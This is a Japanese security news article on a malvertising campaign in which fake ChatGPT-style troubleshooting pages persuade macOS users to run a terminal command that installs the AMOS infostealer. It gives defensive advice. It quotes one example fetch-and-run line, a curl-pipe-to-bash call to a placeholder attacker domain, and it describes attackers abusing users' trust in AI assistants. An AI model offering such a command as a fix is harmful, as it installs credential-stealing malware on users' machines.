新たなマルウェアキャンペーンでは、AIサポートツールに対するユーザーの信頼を悪用し、偽のChatGPTトラブルシューティングセッションを通じてmacOSデバイスにAMOS InfoStealerを感染させている。
音声の不具合の解決など、簡単な修正方法を探している被害者は、悪意あるGoogle広告から、システム修復を装ったターミナルコマンドを表示する、本物らしいChatGPT風のインターフェースへ誘導される。
Krollの研究者らは、マルウェアがインストールされると、「…システムから機密データを正常に窃取した」と述べた。
検索広告からシステム侵害へ
偽のインストーラーやメール添付ファイル、明らかに不審なダウンロードに依存する従来のフィッシングキャンペーンとは異なり、この攻撃は日常的で信頼できるものと感じられるよう設計されている。
被害者が目にするのは、正当なトラブルシューティングの案内を提供しているように見える、検索結果や広告に埋め込まれた悪意あるコンテンツだ。
このやり取りは通常のサポート対応を模倣している。ユーザーが問題を説明し、明確で権威ある回答を受け、「問題を修正」するために単一のターミナルコマンドを実行するよう指示される。その信頼が生まれる瞬間こそが、侵害を引き起こす。
攻撃者が提供するコマンドは、開発者やITプロフェッショナルが頻繁に使う、見慣れたワンライナーのパターンに従っている。
curl -s https://attacker-example[.]com/installer.sh | bash
一見すると、オープンソースツールの標準的なインストール方法や、簡単な修正を適用する手段に見える。
しかし実際には、このパイプラインはユーザーが内容を確認する機会を与えないまま、リモートのシェルスクリプトを直ちにダウンロードして実行する。
この動作は、MITRE ATT&CKのユーザー実行や侵入ツール転送といった攻撃手法に直接対応しており、攻撃者は正規のシステムユーティリティーを利用してマルウェアの配布を開始する。
実行されると、スクリプトはAMOSインフォスティーラーをひそかにインストールし、再起動後も活動を維持する永続化メカニズムを確立したうえで、ブラウザーの認証情報やCookie、暗号資産ウォレットなどの機密データの収集を開始する。
この活動はターミナル内で行われ、macOSに組み込まれたツールを利用するため、通常のインストーラー画面やGatekeeperの警告、その他の目に見えるセキュリティダイアログが表示されるのを回避し、感染がほとんど気づかれないまま進行する。
Krollの研究者らは、このキャンペーンの有効性が、その背後にあるインフラによってさらに高められていると指摘する。
悪意ある広告やランディングページでは、正規サービスによく似たドメインやブランド表示が使われており、ユーザーの警戒心を大幅に低下させ、標的が提示された指示に従う可能性を高めている。
AIベースのソーシャルエンジニアリングが機能する理由
この手法が有効なのは、迅速で権威あるトラブルシューティングをAIツールに頼るという、広がりつつある行動規範を悪用するためだ。
静的なフィッシングページではなく、完全に対話可能なChatGPT風のインターフェースを通じて誘い込むことで、ユーザーにはその体験が身近で信頼できるものに感じられる。
その手順は、問題を特定し、診断を受け、提案されたコマンドを実行するという正規のサポート対応を忠実に再現しており、警戒を緩め、指示に従うよう促す。
さらに、スポンサー広告による検索エンジン汚染を通じて露出が増幅され、ユーザーが最も目にしやすい場所に悪意あるコンテンツが表示される。
ペイロードを通常のmacOS修復コマンドとして見せることで迅速な実行を促す一方、従来のダウンロードやインストーラー画面、認証プロンプトがないため、本来なら疑念を抱かせる可能性のある障壁も取り除かれている。
これらの要素が組み合わさることで、攻撃者は管理されていない個人システムと企業のBYOD環境の双方に侵入する、非常に信頼性の高い足がかりを得る。
AI主導のソーシャルエンジニアリングによるリスクを低減する
ユーザーがAI生成のトラブルシューティング案内に従うことに慣れるにつれ、ターミナルベースのソーシャルエンジニアリング攻撃はますます効果的になっている。
こうしたキャンペーンはソフトウェアの脆弱性を悪用するのではなく、信頼や日常的なワークフロー、正規のシステムツールを利用して、気づかれないうちに侵害を確立する。
この手法に対抗するには、危険なコマンドの実行を制限し、悪用を早期に検知し、認証情報窃取の影響を抑える多層的な対策が必要だ。
- 従業員を教育し、AIチャットや広告、見慣れないトラブルシューティングサイトからのターミナルベースの指示を高リスクなものとして扱い、未検証のコマンドを実行しないよう徹底する。
- macOS向けのエンドポイント検知・対応機能を導入し、cURLパイプラインやbashの実行、永続化の試みなど、不審なシェル活動を監視・阻止できるようにする。
- 次のようなコマンド実行を制限する:curl | bash型のパターンをブロックまたは警告の対象とし、スクリプト署名を義務付け、シェルの使用を承認済みのユーザーとデバイスに限定する。
- 導入するDNS、Web、出口トラフィックのフィルタリングにより、新たに登録されたドメインや悪意あるドメインをブロックし、検索エンジンや広告を利用した配布インフラへの露出を減らす。
- 強化するアイデンティティと認証情報の保護を、フィッシング耐性のあるMFAの適用、ローカル管理者アクセスの制限、企業の認証情報をブラウザーに保存しない運用によって実現する。
- 継続的に監視する対象には、異常な外向き接続、設定変更、認証情報やトークンへのアクセスなど、侵害の兆候(IoC)が含まれる。また、定期的なシミュレーションによって検知機能をテストする。
これらの対策を組み合わせることで、組織はターミナルベースの攻撃への露出を減らしながら、エンドユーザーにとって実用的かつ効率的なワークフローを維持できる。
攻撃者がAIへの信頼を武器にしている
このキャンペーンは攻撃者の戦術における、より大きな変化を反映している。従来のフィッシングページに代わり、AI風のインターフェースが好ましい配布手段になりつつある。
ユーザーがトラブルシューティングや案内をチャットベースのツールに頼ることに慣れるにつれ、攻撃者はそうしたやり取りを説得力のある精度で再現できるようになっている。
AMOSキャンペーンは、正規のAIによる助言に従っていると信じたユーザーが、たった1つのコピー&ペーストコマンドを実行するだけで、macOSシステムをほぼ瞬時に侵害され得ることを示している。
AIが日常的なサポートや生産性向上のワークフローにさらに深く組み込まれるにつれ、攻撃者はその信頼を悪用し続けるだろう。AIブランドを冠した誘い込みは、組織がセキュリティモデルで考慮すべき、増加し続ける永続的なリスクとなる。
AIを利用したなりすましが現実味を増す中、防御の重点は検知することへと移りつつある。対象となるのは、改変されたコンテンツや合成コンテンツだ。





